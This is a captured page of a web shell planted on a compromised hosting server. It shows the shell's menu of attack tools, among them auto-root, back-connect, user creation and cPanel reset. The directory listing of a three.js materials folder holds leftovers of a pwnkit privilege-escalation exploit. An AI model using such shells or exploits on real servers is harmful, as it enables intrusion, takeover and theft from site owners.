Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.129.209.198
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
src /
materials /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LineBasicMaterial.js
727
B
-rw-r--r--
LineDashedMaterial.js
524
B
-rw-r--r--
Material.js
14.4
KB
-rw-r--r--
Materials.js
1.39
KB
-rw-r--r--
MeshBasicMaterial.js
1.57
KB
-rw-r--r--
MeshDepthMaterial.js
977
B
-rw-r--r--
MeshDistanceMaterial.js
699
B
-rw-r--r--
MeshLambertMaterial.js
2.54
KB
-rw-r--r--
MeshMatcapMaterial.js
1.49
KB
-rw-r--r--
MeshNormalMaterial.js
1.24
KB
-rw-r--r--
MeshPhongMaterial.js
2.67
KB
-rw-r--r--
MeshPhysicalMaterial.js
4.22
KB
-rw-r--r--
MeshStandardMaterial.js
2.66
KB
-rw-r--r--
MeshToonMaterial.js
2.2
KB
-rw-r--r--
PointsMaterial.js
719
B
-rw-r--r--
RawShaderMaterial.js
268
B
-rw-r--r--
ShaderMaterial.js
3.91
KB
-rw-r--r--
ShadowMaterial.js
513
B
-rw-r--r--
SpriteMaterial.js
761
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MeshNormalMaterial.js
import { TangentSpaceNormalMap } from '../constants.js'; import { Material } from './Material.js'; import { Vector2 } from '../math/Vector2.js'; class MeshNormalMaterial extends Material { constructor( parameters ) { super(); this.isMeshNormalMaterial = true; this.type = 'MeshNormalMaterial'; this.bumpMap = null; this.bumpScale = 1; this.normalMap = null; this.normalMapType = TangentSpaceNormalMap; this.normalScale = new Vector2( 1, 1 ); this.displacementMap = null; this.displacementScale = 1; this.displacementBias = 0; this.wireframe = false; this.wireframeLinewidth = 1; this.flatShading = false; this.setValues( parameters ); } copy( source ) { super.copy( source ); this.bumpMap = source.bumpMap; this.bumpScale = source.bumpScale; this.normalMap = source.normalMap; this.normalMapType = source.normalMapType; this.normalScale.copy( source.normalScale ); this.displacementMap = source.displacementMap; this.displacementScale = source.displacementScale; this.displacementBias = source.displacementBias; this.wireframe = source.wireframe; this.wireframeLinewidth = source.wireframeLinewidth; this.flatShading = source.flatShading; return this; } } export { MeshNormalMaterial };
Close